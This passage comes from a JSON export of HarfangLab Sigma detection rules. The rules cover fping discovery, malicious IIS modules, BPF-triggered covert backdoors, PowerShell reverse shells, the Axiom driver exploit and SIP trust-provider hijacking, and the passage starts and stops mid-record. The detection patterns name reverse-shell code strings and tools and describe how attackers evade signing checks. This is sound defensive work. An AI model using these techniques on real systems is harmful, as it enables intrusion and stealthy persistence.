"268199bf-94d2-43fe-aa0c-677157a424c0", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "weak", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.612240Z", "creation_date": "2026-03-23T11:45:34.612244Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.612252Z", "rule_level": "medium", "rule_confidence": "weak", "rule_confidence_override": null, "references": [ "https://www.kali.org/tools/fping/", "https://attack.mitre.org/techniques/T1018/" ], "name": "t1018_fping.yml", "content": "title: Fping Execution\nid: 268199bf-94d2-43fe-aa0c-677157a424c0\ndescription: |\n Detects the execution of fping, a ping-like tool that uses the Internet Control Message Protocol (ICMP) to discover active devices within a network.\n Attackers may use it during discovery phase to discover remote systems.\n It is recommended to investigate other actions taken by this user in their session.\nreferences:\n - https://www.kali.org/tools/fping/\n - https://attack.mitre.org/techniques/T1018/\ndate: 2022/12/23\nmodified: 2026/02/27\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1018\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Tool.Fping\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/fping'\n ParentImage|contains: '?'\n\n exclusion_zabbix:\n - ParentImage: '/usr/sbin/zabbix_server'\n - GrandparentImage:\n - '/usr/sbin/zabbix_server'\n - '/usr/sbin/zabbix_proxy'\n - '/usr/sbin/zabbix_server_mysql'\n - '/usr/sbin/zabbix_server_pgsql'\n - '/usr/sbin/zabbix_proxy_mysql'\n - '/usr/sbin/zabbix_proxy_pgsql'\n - ParentCommandLine:\n - 'sh -c /usr/bin/fping -C3 -i0 2>&1 &1 |]]+\\.dll$'\n - '(?i)^[A-Z]:\\\\inetpub\\\\wwwroot\\\\bin\\\\[[:print:]&&[^/\\\\:\\*\\?\\\"<>|]]+\\.dll$'\n - '(?i)^[A-Z]:\\\\inetpub\\\\temp\\\\[[:print:]&&[^/\\\\:\\*\\?\\\"<>|]]+\\.dll$'\n - '(?i)^[A-Z]:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\[[:print:]&&[^/:\\*\\?\\\"<>|]]+\\\\bin\\\\[[:print:]&&[^/\\\\:\\*\\?\\\"<>|]]+\\.dll$'\n LibraryType: 'Native'\n AgentVersion|gte|version: 4.3 # Starting this version, managed/native DLL are both considered and are not detected the same way. See 0ae4376f-360f-4b97-9b3f-4c735a82fbf6 for previous variant.\n\n filter_legitimate_common_modules_bypath:\n ImageLoaded:\n - '?:\\Windows\\System32\\inetsrv\\authanon.dll'\n - '?:\\Windows\\System32\\inetsrv\\authbas.dll'\n - '?:\\Windows\\System32\\inetsrv\\authcert.dll'\n - '?:\\Windows\\System32\\inetsrv\\authmap.dll'\n - '?:\\Windows\\System32\\inetsrv\\authmd5.dll'\n - '?:\\Windows\\System32\\inetsrv\\authsspi.dll'\n - '?:\\Windows\\System32\\inetsrv\\cachfile.dll'\n - '?:\\Windows\\System32\\inetsrv\\cachhttp.dll'\n - '?:\\Windows\\System32\\inetsrv\\cachtokn.dll'\n - '?:\\Windows\\System32\\inetsrv\\cachuri.dll'\n - '?:\\Windows\\System32\\inetsrv\\cgi.dll'\n - '?:\\Windows\\System32\\inetsrv\\compdyn.dll'\n - '?:\\Windows\\System32\\inetsrv\\compstat.dll'\n - '?:\\Windows\\System32\\inetsrv\\custerr.dll'\n - '?:\\Windows\\System32\\inetsrv\\defdoc.dll'\n - '?:\\Windows\\System32\\inetsrv\\diprestr.dll'\n - '?:\\Windows\\System32\\inetsrv\\dirlist.dll'\n - '?:\\Windows\\System32\\inetsrv\\filter.dll'\n - '?:\\Windows\\System32\\inetsrv\\gzip.dll'\n - '?:\\Windows\\System32\\inetsrv\\iis_ssi.dll'\n - '?:\\Windows\\System32\\inetsrv\\iiscore.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisetw.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisfcgi.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisfreb.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisreqs.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisres.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisutil.dll'\n - '?:\\Windows\\System32\\inetsrv\\iiswsock.dll'\n - '?:\\Windows\\System32\\inetsrv\\iprestr.dll'\n - '?:\\Windows\\System32\\inetsrv\\isapi.dll'\n - '?:\\Windows\\System32\\inetsrv\\logcust.dll'\n - '?:\\Windows\\System32\\inetsrv\\loghttp.dll'\n - '?:\\Windows\\System32\\inetsrv\\modrqflt.dll'\n - '?:\\Windows\\System32\\inetsrv\\nativerd.dll'\n - '?:\\Windows\\System32\\inetsrv\\protsup.dll'\n - '?:\\Windows\\System32\\inetsrv\\redirect.dll'\n - '?:\\Windows\\System32\\inetsrv\\rewrite.dll'\n - '?:\\Windows\\System32\\inetsrv\\static.dll'\n - '?:\\Windows\\System32\\inetsrv\\validcfg.dll'\n - '?:\\Windows\\System32\\inetsrv\\w3dt.dll'\n - '?:\\Windows\\System32\\inetsrv\\w3tp.dll'\n - '?:\\Windows\\System32\\inetsrv\\w3wphost.dll'\n - '?:\\Windows\\System32\\inetsrv\\warmup.dll'\n - '?:\\Windows\\System32\\inetsrv\\wbhst_pm.dll'\n\n filter_signed_imageloaded:\n Signed: 'true'\n SignatureStatus: 'Valid'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n - 'Microsoft Windows Publisher'\n\n exclusion_legitimate_ms_safehtml:\n Company: 'Microsoft Corporation'\n Description: 'Microsoft SafeHtml filter'\n InternalName: 'osafehtm'\n Product:\n - 'Microsoft SafeHtml'\n - '*Exchange - For Testing Purposes Only*'\n ImageLoaded|endswith: '\\osafehtm.dll'\n\n exclusion_legitimate_bo_crystalreports:\n Company: 'Business Objects'\n LegalCopyright|endswith: 'Business Objects'\n Product|startswith: 'Crystal Reports'\n ImageLoaded|endswith:\n - '\\CrystalDecisions.CrystalReports.Engine.dll'\n - '\\CrystalDecisions.ReportSource.dll'\n - '\\CrystalDecisions.Shared.dll'\n - '\\CrystalDecisions.Web.dll'\n\n exclusion_legitimate_ge_healtcare:\n Company: 'GE Healthcare'\n Product|startswith: 'Dicom'\n ImageLoaded|endswith: '\\DicomFileParser.dll'\n\n exclusion_legitimate_infor_mingle:\n Company: 'Infor'\n Description: 'Infor.Mingle Extension Module for IIS'\n ImageLoaded|endswith: '\\Infor.Mingle.IISModule.dll'\n\n exclusion_legitimate_zedoc:\n Company: 'BSV'\n Description|startswith: 'BSV.'\n InternalName|startswith: 'BSV.'\n ImageLoaded|endswith: '\\bin\\BSV.Videocodage.dll'\n\n exclusion_legitimate_mysqladonet:\n Company: 'MySQL AB'\n Description|startswith: 'MySql.'\n InternalName|startswith: 'MySql.'\n LegalCopyright|endswith: ', MySQL AB'\n ImageLoaded|endswith: '\\bin\\MySql.Data.dll'\n\n exclusion_legitimate_stripheaders:\n ImageLoaded: '?:\\Windows\\System32\\inetsrv\\stripheaders.dll'\n sha256:\n - 'ce3698854f86e1c18f7926d57aec9a6fdba633341a128bec799698e76ef8e144'\n - '16151bbbe127469a0aab8ce7f4f954a2e585201f7d27f8ab7895a62b60f056a9'\n\n exclusion_legitimate_webdav:\n ImageLoaded: '?:\\Windows\\System32\\inetsrv\\webdav.dll'\n sha256:\n - 'fdddf849ba5c8de2f8df9650ab32578e0e74ed607f741013fa50058206b811bf'\n - '94003c985396df6f422d4ad99651a66aee401f9846ed80f82f66f2db77b3391f'\n - '53b61306ed62687b5aeeb380cda96d8a70641d4f1ab58edc26978a181d7fe1d0'\n - '8e430996c1ec91f8ef6d1b10017ad18eddde3027574cafdeb6e42e90bce516e6'\n\n exclusion_legitimate_freeimage:\n Company: 'FreeImage'\n Signed: 'true'\n SignatureStatus: 'Valid'\n Signature: 'Soft Gold ltd'\n\n exclusion_textcontrol:\n ImageLoaded: '?:\\inetpub\\wwwroot\\bin\\tx??_*.dll'\n Company: 'Text Control GmbH'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nfalsepositives:\n - Some web applications legitimately requires the loading of an unsigned library server-wide.\nlevel: medium\n# level: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "29dfc6e6-c42a-4009-8e21-367675f7e417", "rule_name": "Suspicious IIS Module Loaded", "rule_description": "Detects the loading of a suspicious (native) library by an IIS worker process in system-wide IIS binary module directories.\nMalicious DLLs loaded by an IIS worker can be used for different purposes, mostly to act as webshells.\nIt is recommended to analyze the content of the loaded library to look for malicious content and to analyze subprocesses of the IIS worker for malicious behavior.\n", "rule_creation_date": "2025-01-28", "rule_modified_date": "2026-01-06", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.persistence" ], "rule_technique_tags": [ "attack.t1505.004" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2a006be4-b10c-4a12-ab2f-98057371169c", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.620176Z", "creation_date": "2026-03-23T11:45:34.620178Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.620182Z", "rule_level": "high", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor", "https://nikhilh-20.github.io/blog/cbpf_bpfdoor/", "https://github.com/gwillgues/BPFDoor", "https://www.fortinet.com/blog/threat-research/new-ebpf-filters-for-symbiote-and-bpfdoor-malware", "https://attack.mitre.org/techniques/T1205/001/" ], "name": "t1205_001_possible_cbpf_covert_backdoor.yml", "content": "title: Possible Classic BPF Triggered Covert Backdoor\nid: 2a006be4-b10c-4a12-ab2f-98057371169c\ndescription: |\n Detects Classic BPF program loaded with instructions commonly used by malwares.\n Threat actors can abuse Classic BPF by attaching highly selective packet-filter programs to raw sockets so their implants only wake up when specially crafted “magic” traffic appears, drastically reducing noise and detection opportunities.\n Because Classic BPF executes inside the kernel, it lets malicious tools inspect all inbound packets—even those not addressed to the malicious process—while remaining lightweight and difficult for defenders to notice.\n Attackers can then use BPF’s filtering to covertly trigger backdoor functionality or communication channels without exposing obvious network listeners or suspicious traffic patterns.\n Finally, they may pair BPF with firewall or routing manipulation to hijack existing flows or redirect traffic in ways that appear legitimate to normal monitoring tools.\n It is recommended to check the process which loaded the Classic BPF program for suspicious activities.\nreferences:\n - https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor\n - https://nikhilh-20.github.io/blog/cbpf_bpfdoor/\n - https://github.com/gwillgues/BPFDoor\n - https://www.fortinet.com/blog/threat-research/new-ebpf-filters-for-symbiote-and-bpfdoor-malware\n - https://attack.mitre.org/techniques/T1205/001/\ndate: 2025/08/11\nmodified: 2026/01/22\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.defense_evasion\n - attack.t1205.001\n - attack.t1205.002\n - classification.Linux.Source.Bpf\n - classification.Linux.Behavior.CommandAndControl\n - classification.Linux.Behavior.DefenseEvasion\n - classification.Linux.Behavior.NetworkActivity\nlogsource:\n product: linux\n category: bpf_event\ndetection:\n selection:\n Kind: 'cbpf_load'\n BpfDump|contains|all:\n # ldh [0xc] : Get the \"EtherType\" field at offset 0xc\n - '280000000c000000'\n # jeq 0x800, ??? : if EtherType == IPv4 (0x800), jump\n - '15000????0080000'\n # ldh [0x14] : Get the \"Fragment Offset\" of the IPv4 header\n # jset 0x1fff, ?? : Compare the Fragment Offset value with 0x1fff\n - '2800000014000000450?????ff1f0000'\n # ldb [0x17] : Get the protocol field at offset 0x17 in the IPv4 header\n - '3000000017000000'\n # ldxb 4*([14]&0xf) : Loads a byte from offset 14 and perform various operations\n # to get the total size of the IPv4 header\n - 'b10000000e000000'\n InstructionCount|gte: 15\n\n exclusion_networking_tools:\n Image:\n # tcpdump\n - '/usr/bin/tcpdump'\n - '/usr/sbin/tcpdump'\n - '/usr/local/bin/tcpdump'\n - '/usr/bin/dumpcap'\n # nmap\n - '/usr/local/bin/nmap'\n - '/opt/domotz/bin/domotz_nmap'\n - '/usr/lib/nmap/nmap'\n # openvas\n - '*/sbin/openvas'\n - '*/sbin/openvassd'\n - '/opt/detect/sbin/openvassd'\n # dhclient\n - '/sbin/dhclient'\n - '/usr/sbin/dhclient'\n - '/usr/local/dhcp_probe/bin/dhcp_probe'\n # nessusd\n - '/opt/nessus/sbin/nessusd'\n # vdcm\n - '/opt/vdcm/libexec/DCM_IO'\n # dhcp\n - '/usr/sbin/kea-dhcp4'\n - '/opt/kea/sbin/kea-dhcp4'\n - '/usr/sbin/dhcpd'\n # radsniff\n - '/usr/bin/radsniff'\n # dns\n - '*/bin/dnstop'\n # tracerout\n - '/usr/bin/tcptraceroute.mt'\n # port-knock server  \n - '*/sbin/knockd'\n\n exclusion_containers:\n ProcessAncestors|contains:\n - '/bin/containerd-shim'\n - '|/usr/bin/lxc-start'\n\n exclusion_security_tools:\n Image:\n - '/opt/endpoint-agent/agent' # Sekoia\n - '/usr/share/auditbeat/bin/auditbeat'\n - '/usr/bin/suricata'\n\n exclusion_fingerbank:\n Image : '/usr/local/fingerbank/collector/fingerbank-collector'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2a006be4-b10c-4a12-ab2f-98057371169c", "rule_name": "Possible Classic BPF Triggered Covert Backdoor", "rule_description": "Detects Classic BPF program loaded with instructions commonly used by malwares.\nThreat actors can abuse Classic BPF by attaching highly selective packet-filter programs to raw sockets so their implants only wake up when specially crafted “magic” traffic appears, drastically reducing noise and detection opportunities.\nBecause Classic BPF executes inside the kernel, it lets malicious tools inspect all inbound packets—even those not addressed to the malicious process—while remaining lightweight and difficult for defenders to notice.\nAttackers can then use BPF’s filtering to covertly trigger backdoor functionality or communication channels without exposing obvious network listeners or suspicious traffic patterns.\nFinally, they may pair BPF with firewall or routing manipulation to hijack existing flows or redirect traffic in ways that appear legitimate to normal monitoring tools.\nIt is recommended to check the process which loaded the Classic BPF program for suspicious activities.\n", "rule_creation_date": "2025-08-11", "rule_modified_date": "2026-01-22", "rule_os": "linux", "rule_status": null, "rule_tactic_tags": [ "attack.command_and_control", "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1205.001", "attack.t1205.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2a2ab0d4-c555-4e90-b3f0-e8025296440a", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:35.296703Z", "creation_date": "2026-03-23T11:45:35.296705Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:35.296710Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/t0mbombadil/TOOLS/blob/master/Exfiltration/ReverseShellSamples.ps1", "https://github.com/besimorhino/powercat", "https://github.com/antonioCoco/ConPtyShell", "https://attack.mitre.org/techniques/T1059/001/" ], "name": "t1059_001_reverse_shell_powershell.yml", "content": "title: PowerShell Reverse Shell Executed\nid: 2a2ab0d4-c555-4e90-b3f0-e8025296440a\ndescription: |\n Detects suspicious reverse shell execution via PowerShell.\n A reverse shell is shell session that is initiated from a remote machine.\n Attackers often use reverse shell to bypass firewalls restrictions.\n It is recommended to analyze the PowerShell script content as well as to look for malicious processes and actions stemming from the PowerShell process.\nreferences:\n - https://github.com/t0mbombadil/TOOLS/blob/master/Exfiltration/ReverseShellSamples.ps1\n - https://github.com/besimorhino/powercat\n - https://github.com/antonioCoco/ConPtyShell\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/07/01\nmodified: 2026/03/10\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.command_and_control\n - attack.t1095\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.RemoteShell\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_command1:\n PowershellCommand|contains|all:\n - 'Net.Sockets.TCPClient'\n - '.GetStream('\n - '.Read('\n - '.GetString('\n\n selection_command2:\n # https://podalirius.net/fr/reverse-shells/windows-reverse-shells-cheatsheet/\n PowershellCommand|contains|all:\n - 'New-Object -TypeName System.Text.ASCIIEncoding).GetString('\n - '(pwd).Path'\n - '([Text.Encoding]::ASCII).GetBytes('\n\n selection_cmdlet:\n PowershellCommand|contains:\n # https://github.com/besimorhino/powercat\n - 'powercat '\n # https://github.com/antonioCoco/ConPtyShell\n - 'Invoke-ConPtyShell '\n\n exclusion_bmc:\n ProcessParentCommandLine: '?:\\Program Files\\BMC Software\\BladeLogic\\RSCD\\/RSCD.exe'\n PowershellCommand|contains|all:\n - 'Opening the socket from $sourceIP'\n - 'tConnected !'\n\n exclusion_defender:\n PowershellScriptPath: '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Downloads\\PSScript_{????????-????-????-????-????????????}.ps1'\n PowershellCommand|contains:\n - '[void]$socket.ConnectAsync($RemoteIP, $RemotePort).Wait(200)'\n - '$TcpSocket = New-Object Net.Sockets.TcpClient -ErrorAction SilentlyContinue'\n - '$SslStream = New-Object Net.Security.SslStream $TcpClient.GetStream()'\n - '$ProtocolNames= @(\"ssl2\",\"ssl3\",\"tls\",\"tls11\",\"tls12\")'\n\n exclusion_icinga:\n - PowershellScriptPath: '?:\\Program Files\\WindowsPowerShell\\Modules\\icinga-powershell-framework\\cache\\framework_cache.psm1'\n - ProcessParentImage: '?:\\Program Files\\ICINGA2\\sbin\\icinga2.exe'\n - PowershellCommand|contains|all:\n - 'https://github.com/Icinga/icinga-powershell-framework'\n - 'function Get-IcingaDirectorSelfServiceConfig()'\n\n exclusion_opsramp:\n PowershellScriptPath|startswith: '?:\\Program Files (x86)\\OpsRamp\\Agent\\'\n\n exclusion_lpar2rrd:\n PowershellCommand|contains|all:\n - '## lpar2rrd-agent.ps1'\n - '# implementation notes for daemon on lpar2rrd server side'\n\n exclusion_synology_backup:\n # $b64 = \"QhAABmFjdGlvbhAAD3Rlc3RfY29ubmVjdGlvbkA=\"\n # Command sent to the backup server to test the connection.\n - PowershellCommand|contains: '$b64 = \"QhAABmFjdGlvbhAAD3Rlc3RfY29ubmVjdGlvbkA=\"'\n - ProcessCommandLine|contains:\n - 'JABiADYANAAgAD0AIAAiAFEAaABBAEEAQgBtAEYAagBkAEcAbAB2AGIAaABBAEEARAAzAFIAbABjADMAUgBmAFkAMgA5AHUAYgBtAFYAagBkAEcAbAB2AGIAawBBAD0A'\n - 'QAYgA2ADQAIAA9ACAAIgBRAGgAQQBBAEIAbQBGAGoAZABHAGwAdgBiAGgAQQBBAEQAMwBSAGwAYwAzAFIAZgBZADIAOQB1AGIAbQBWAGoAZABHAGwAdgBiAGsAQQA9A'\n - 'kAGIANgA0ACAAPQAgACIAUQBoAEEAQQBCAG0ARgBqAGQARwBsAHYAYgBoAEEAQQBEADMAUgBsAGMAMwBSAGYAWQAyADkAdQBiAG0AVgBqAGQARwBsAHYAYgBrAEEAPQ'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2a2ab0d4-c555-4e90-b3f0-e8025296440a", "rule_name": "PowerShell Reverse Shell Executed", "rule_description": "Detects suspicious reverse shell execution via PowerShell.\nA reverse shell is shell session that is initiated from a remote machine.\nAttackers often use reverse shell to bypass firewalls restrictions.\nIt is recommended to analyze the PowerShell script content as well as to look for malicious processes and actions stemming from the PowerShell process.\n", "rule_creation_date": "2022-07-01", "rule_modified_date": "2026-03-10", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.command_and_control", "attack.execution" ], "rule_technique_tags": [ "attack.t1059.001", "attack.t1095" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2a2b0d94-09c6-4f43-8904-7c9d3a1ab4fb", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "critical", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.071468Z", "creation_date": "2026-03-23T11:45:34.071470Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.071474Z", "rule_level": "critical", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/mallo-m", "https://github.com/ASkyeye/CVE-2018-19320" ], "name": "t1562_001_axiomdriver_created.yml", "content": "title: AxiomDriver Created\nid: 2a2b0d94-09c6-4f43-8904-7c9d3a1ab4fb\ndescription: |\n Detects the creation of the Axiom driver.\n Axiom are tools used for malicious activities such as dumping the LSASS' process memory or loading shellcodes using different techniques to avoid being detected by security tools such as EDRs.\n Axiom can exploit CVE-2018-19320 in the GIGABYTE driver, allowing an attacker to disable Driver Signing Enforcement (DSE), which enables them to load malicious and unsigned drivers.\n It is recommended to investigate the execution context and drivers loaded before this one to determine if a vulnerable driver has not already been loaded beforehand to disable DSE.\nreferences:\n - https://github.com/mallo-m\n - https://github.com/ASkyeye/CVE-2018-19320\ndate: 2025/03/26\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path: '?:\\Windows\\System32\\Drivers\\AxiomDriver.sys'\n\n condition: selection\nlevel: critical\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2a2b0d94-09c6-4f43-8904-7c9d3a1ab4fb", "rule_name": "AxiomDriver Created", "rule_description": "Detects the creation of the Axiom driver.\nAxiom are tools used for malicious activities such as dumping the LSASS' process memory or loading shellcodes using different techniques to avoid being detected by security tools such as EDRs.\nAxiom can exploit CVE-2018-19320 in the GIGABYTE driver, allowing an attacker to disable Driver Signing Enforcement (DSE), which enables them to load malicious and unsigned drivers.\nIt is recommended to investigate the execution context and drivers loaded before this one to determine if a vulnerable driver has not already been loaded beforehand to disable DSE.\n", "rule_creation_date": "2025-03-26", "rule_modified_date": "2025-03-31", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1562.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2a653231-c597-40e1-b664-2415c9a4a2e4", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:35.296105Z", "creation_date": "2026-03-23T11:45:35.296108Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:35.296115Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf", "https://learn.microsoft.com/en-us/archive/blogs/eduardonavarro/sips-subject-interface-package-and-authenticode", "https://attack.mitre.org/techniques/T1553/003/" ], "name": "t1553_003_sip_trust_provider_hijacking.yml", "content": "title: SIP or Trust Provider Hijacked via Registry Modification\nid: 2a653231-c597-40e1-b664-2415c9a4a2e4\ndescription: |\n Detects modifications to registry keys associated with Windows Subject Interface Packages (SIPs) and Trust Providers, which are used to validate digital signatures and code trust.\n SIPs handle digital signature creation, retrieval, and hash validation for various file formats (PE, PowerShell, MSI, etc.), while Trust Providers perform the actual trust decisions via the WinVerifyTrust API. Attackers with elevated privileges can hijack these components by modifying the Dll or FuncName registry values to point to malicious code or abuse legitimate signed functions (e.g., ntdll!DbgUiContinue) to bypass signature validation. This technique allows unsigned or malicious code to appear legitimately signed, evade security products, bypass application whitelisting solutions like Device Guard, and achieve persistent code execution in processes that perform trust validation.\n Investigate any modifications to these registry paths by examining the process responsible for the change, validating the referenced DLL against known-good baselines, and checking for indicators of compromise such as non-standard DLLs or function names like DbgUiContinue being used for hash verification.\nreferences:\n - https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf\n - https://learn.microsoft.com/en-us/archive/blogs/eduardonavarro/sips-subject-interface-package-and-authenticode\n - https://attack.mitre.org/techniques/T1553/003/\ndate: 2026/01/29\nmodified: 2026/02/17\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.003\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_dll:\n EventType: SetValue\n TargetObject:\n # SIP Signature retrieval DLL\n - 'HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{????????-????-????-????-????????????}\\Dll'\n - 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{????????-????-????-????-????????????}\\Dll'\n # Hash validation DLL\n - 'HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{????????-????-????-????-????????????}\\Dll'\n - 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{????????-????-????-????-????????????}\\Dll'\n\n selection_funcname:\n EventType: SetValue\n TargetObject:\n # SIP signature retrieval function\n - 'HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{????????-????-????-????-????????????}\\FuncName'\n - 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{????????-????-????-????-????????????}\\FuncName'\n # Hash validation function\n - 'HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{????????-????-????-????-????????????}\\FuncName'\n - 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{????????-????-????-????-????????????}\\FuncName'\n\n selection_filetype:\n TargetObject|contains:\n - '{C689AAB8-8E78-11D0-8C47-00C04FC295EE}' # PEs\n - '{603BCC1F-4B59-4E08-B724-D2C6297EF351}' # PowerShell\n - '{DE351A43-8E59-11D0-8C47-00C04FC295EE}' # Catalog\n - '{000C10F1-0000-0000-C000-000000000046}' # MSI\n - '{C689AABA-8E78-11D0-8C47-00C04FC295EE}' # Cabinet\n\n 